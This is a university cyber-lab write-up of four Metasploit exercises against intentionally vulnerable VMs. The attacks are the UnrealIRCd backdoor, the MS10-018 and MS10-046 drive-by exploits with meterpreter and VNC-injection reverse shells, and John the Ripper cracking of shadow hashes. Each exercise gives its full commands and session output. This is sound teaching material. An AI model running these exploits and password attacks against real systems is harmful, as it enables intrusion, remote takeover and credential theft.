Share
## https://sploitus.com/exploit?id=DB840F39-36DA-5995-B990-00BE364FFF5D
# ๐Ÿ’€ System Exploitation & Compromising
### CAP 6135 โ€“ Cyber Lab | Mara Burnside | UCF | April 2026

---

## ๐Ÿ“‹ Overview

Four penetration testing exercises using Metasploit on Kali Linux against two target machines: a Metasploitable 2 Linux VM and a Windows XP SP2 VM. Techniques covered include reverse shell exploitation, browser-based drive-by downloads, VNC remote desktop injection, and offline password cracking.

**All 4 questions completed โ€” 100 points total.**

---

## ๐ŸŽฏ Targets & Tools

| Component | Details |
|---|---|
| Attacker Machine | Kali Linux VM |
| Target 1 | Metasploitable 2 Linux VM |
| Target 2 | Windows XP SP2 VM |
| Primary Tool | Metasploit Framework (`msfconsole`) |
| Password Tool | John the Ripper |
| Shell Types Used | `cmd/unix/reverse`, `meterpreter/reverse_tcp`, `vncinject/reverse_tcp` |

---

## Question 1 โ€” Metasploit Attack on Metasploitable Linux (25 pts)

### Vulnerability: UnrealIRCd 3.2.8.1 Backdoor

UnrealIRCd 3.2.8.1 contained a hardcoded backdoor (CVE-2010-2075) that allowed unauthenticated remote code execution through a crafted IRC connection on port 6667.

### Configuration

| Parameter | Value |
|---|---|
| Exploit | `exploit/unix/irc/unreal_ircd_3281_backdoor` |
| Payload | `cmd/unix/reverse` |
| RHOST (target) | `192.168.56.2` |
| LHOST (Kali) | `192.168.56.3` |
| LPORT | `8888` |

### Commands

```bash
msf > use exploit/unix/irc/unreal_ircd_3281_backdoor
msf exploit(...) > set payload cmd/unix/reverse
msf exploit(...) > set RHOSTS 192.168.56.2
msf exploit(...) > set LHOST 192.168.56.3
msf exploit(...) > set LPORT 8888
msf exploit(...) > exploit
```

### Result

```
[*] Started reverse TCP double handler on 192.168.56.3:8888
[*] 192.168.56.2:6667 - Connected to 192.168.56.2:6667
[*] 192.168.56.2:6667 - Sending IRC backdoor command
[*] Accepted the first client connection ...
[*] Accepted the second client connection ...
[*] Command shell session 1 opened (192.168.56.3:8888 -> 192.168.56.2:42378)
    at 2026-04-16 03:49:41 -0400

uname -a
Linux metasploitable 2.6.24-16-server #1 SMP ...
```

**โœ… Reverse shell obtained. `uname -a` confirmed remote execution on the Metasploitable Linux VM.**

---

## Question 2 โ€” Metasploit Attack on Windows XP โ€” MS10-018 (25 pts)

### Vulnerability: MS10-018 Drive-By Download (IE6 DHTML Behaviors)

MS10-018 is a use-after-free vulnerability in Internet Explorer 6 that executes arbitrary code when a victim visits a malicious web page.

### Configuration

| Parameter | Value |
|---|---|
| Exploit | `exploit/windows/browser/ms10_018_ie_behaviors` |
| Payload | `windows/meterpreter/reverse_tcp` |
| LHOST (Kali) | `10.0.2.15` |
| LPORT | `8888` |
| SRVHOST | `0.0.0.0` |
| SRVPORT (malicious web server) | `8088` |

### Commands

```bash
msf > use exploit/windows/browser/ms10_018_ie_behaviors
msf exploit(...) > set payload windows/meterpreter/reverse_tcp
msf exploit(...) > set LHOST 10.0.2.15
msf exploit(...) > set LPORT 8888
msf exploit(...) > set SRVHOST 0.0.0.0
msf exploit(...) > set SRVPORT 8088
msf exploit(...) > exploit

# Victim visits: http://10.0.2.15:8088/
```

### Post-Exploitation โ€” sysinfo & ipconfig

```
meterpreter > sysinfo
Computer        : VX2POEM
OS              : Windows XP (5.1 Build 2600, Service Pack 2).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows

meterpreter > ipconfig
Interface 2 โ€” AMD PCNET Family PCI Ethernet Adapter
  Hardware MAC : 08:00:27:26:8e:19
  IPv4 Address : 10.0.2.3
  IPv4 Netmask : 255.255.255.0
```

> **Privilege escalation:** Meterpreter automatically migrated to `services.exe (PID 696)` and escalated to `NT AUTHORITY\SYSTEM`.

**โœ… Full Meterpreter session obtained with SYSTEM-level privileges. `sysinfo` and `ipconfig` confirmed remote enumeration of the target.**

---

## Question 3 โ€” Metasploit Attack on Windows XP โ€” MS10-046 VNC (25 pts)

### Vulnerability: MS10-046 Shortcut Icon DLL Loader

MS10-046 exploits how Windows Shell processes `.lnk` shortcut icon files โ€” loading an attacker-supplied DLL automatically when a network share folder is browsed via WebDAV.

### Configuration

| Parameter | Value |
|---|---|
| Exploit | `exploit/windows/browser/ms10_046_shortcut_icon_dllloader` |
| Payload | `windows/vncinject/reverse_tcp` |
| LHOST (Kali) | `10.0.2.15` |
| LPORT | `8888` |
| SRVHOST | `0.0.0.0` |
| SRVPORT (malicious web server) | `80` |
| URIPATH | `/` |

### Commands

```bash
msf > use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
msf exploit(...) > set payload windows/vncinject/reverse_tcp
msf exploit(...) > set LHOST 10.0.2.15
msf exploit(...) > set LPORT 8888
msf exploit(...) > set SRVHOST 0.0.0.0
msf exploit(...) > set SRVPORT 80
msf exploit(...) > set URIPATH /
msf exploit(...) > exploit

# Victim visits: http://10.0.2.15/
```

### Result

```
[*] Using URL: http://10.0.2.15/
[*] Server started.
[*] Sending stage (401920 bytes) to 10.0.2.3
[*] Starting local TCP relay on 127.0.0.1:5900
[*] Local TCP relay started.
[*] Launched vncviewer.
[*] VNC Server session 1 opened (10.0.2.15:8888 -> 10.0.2.3:1118)
    at 2026-04-16 22:10:55 -0400
```

> The `vncinject/reverse_tcp` payload injects a VNC server directly into a running process on the target, providing **full interactive remote desktop control** โ€” not read-only viewing.

**โœ… Full interactive VNC remote desktop session established on the Windows XP machine from Kali Linux.**

---

## Question 4 โ€” Offline Password Cracking with John the Ripper (25 pts)

### Objective

Crack password hashes from a copy of `/etc/shadow` for two user accounts (`newbie1` and `newbie2`) using John the Ripper's dictionary attack mode.

### Setup

| Parameter | Value |
|---|---|
| Target File | `shadow.txt` (copy of `/etc/shadow`) |
| Accounts | `newbie1`, `newbie2` |
| Hash Format | `crypt` (generic crypt3) |
| Wordlist | `/usr/share/john/password.lst` |
| Crack Time | ~57 seconds |

### Commands

```bash
# Navigate to directory containing shadow.txt
cd /media/sf_sharelab
ls
# shadow.txt  Sharelab.textClipping

# Run John the Ripper with crypt format and dictionary wordlist
john --format=crypt --wordlist=/usr/share/john/password.lst shadow.txt

# Verify cracked passwords
john --show shadow.txt

# Filter results from pot file
awk '/ship|unix/' ~/.john/john.pot
grep 'ship\|unix' ~/.john/john.pot
```

### Output

```
Loaded 2 password hashes with 2 different salts (crypt, generic crypt(3) [?/64])
Will run 2 OpenMP threads

ship             (newbie1)
unix             (newbie2)

2g 0:00:00:57 DONE  0.03478g/s  61.66p/s  123.3c/s
Session completed.
```

### Cracked Passwords

| Account | Password |
|---|---|
| `newbie1` | `ship` |
| `newbie2` | `unix` |

**โœ… Both passwords cracked via dictionary attack in under 60 seconds.**

---

## ๐Ÿ” Key Takeaways

**Backdoor vulnerabilities are permanent until patched** โ€” The UnrealIRCd backdoor required zero authentication. Any machine running the affected version was fully exploitable from anywhere on the network.

**Drive-by downloads require only a browser visit** โ€” MS10-018 and MS10-046 both needed no user interaction beyond visiting a URL. Unpatched IE6 on Windows XP was trivially compromised.

**Privilege escalation can be automatic** โ€” Meterpreter's post-exploitation modules automatically migrated to a SYSTEM-level process, going from user-level access to full OS control in seconds.

**VNC injection enables full interactive control** โ€” Unlike a command shell, `vncinject` gives the attacker a live graphical desktop โ€” enabling interaction with GUI applications, observation of user activity, and more.

**Weak passwords crack in under a minute** โ€” Dictionary words like `ship` and `unix` found at the bottom of the standard John wordlist were recovered from shadow hashes in 57 seconds on standard hardware.

**All vulnerabilities were 2010-era CVEs** โ€” Every attack in this lab exploited unpatched software from over a decade ago. The lesson: patch management and disabling legacy services (IRC, IE6) are the most effective mitigations.

---

## ๐Ÿ—‚๏ธ Repository Structure

```
lab5/
โ”œโ”€โ”€ screenshots/
โ”‚   โ”œโ”€โ”€ q1_unrealircd_exploit.png
โ”‚   โ”œโ”€โ”€ q1_uname_result.png
โ”‚   โ”œโ”€โ”€ q2_ms10018_config.png
โ”‚   โ”œโ”€โ”€ q2_meterpreter_sysinfo.png
โ”‚   โ”œโ”€โ”€ q2_meterpreter_ipconfig.png
โ”‚   โ”œโ”€โ”€ q3_ms10046_vnc_session.png
โ”‚   โ”œโ”€โ”€ q3_remote_desktop.png
โ”‚   โ”œโ”€โ”€ q4_john_cracking.png
โ”‚   โ””โ”€โ”€ q4_passwords_found.png
โ”œโ”€โ”€ Lab_Assignment_5_Compromising.pdf
โ””โ”€โ”€ README.md
```

---

## ๐Ÿ–ฅ๏ธ Environment

- **Attacker:** Kali Linux VM
- **Target 1:** Metasploitable 2 Linux VM
- **Target 2:** Windows XP SP2 VM
- **Network:** Host-only adapter (VirtualBox)
- **Course:** CAP 6135 โ€“ Malware and Software Vulnerability Analysis

> โš ๏ธ *All attacks were performed in an isolated lab environment on intentionally vulnerable VMs provided for educational purposes.*

---

*CAP 6135 ยท Lab Assignment #5 ยท University of Central Florida ยท April 2026*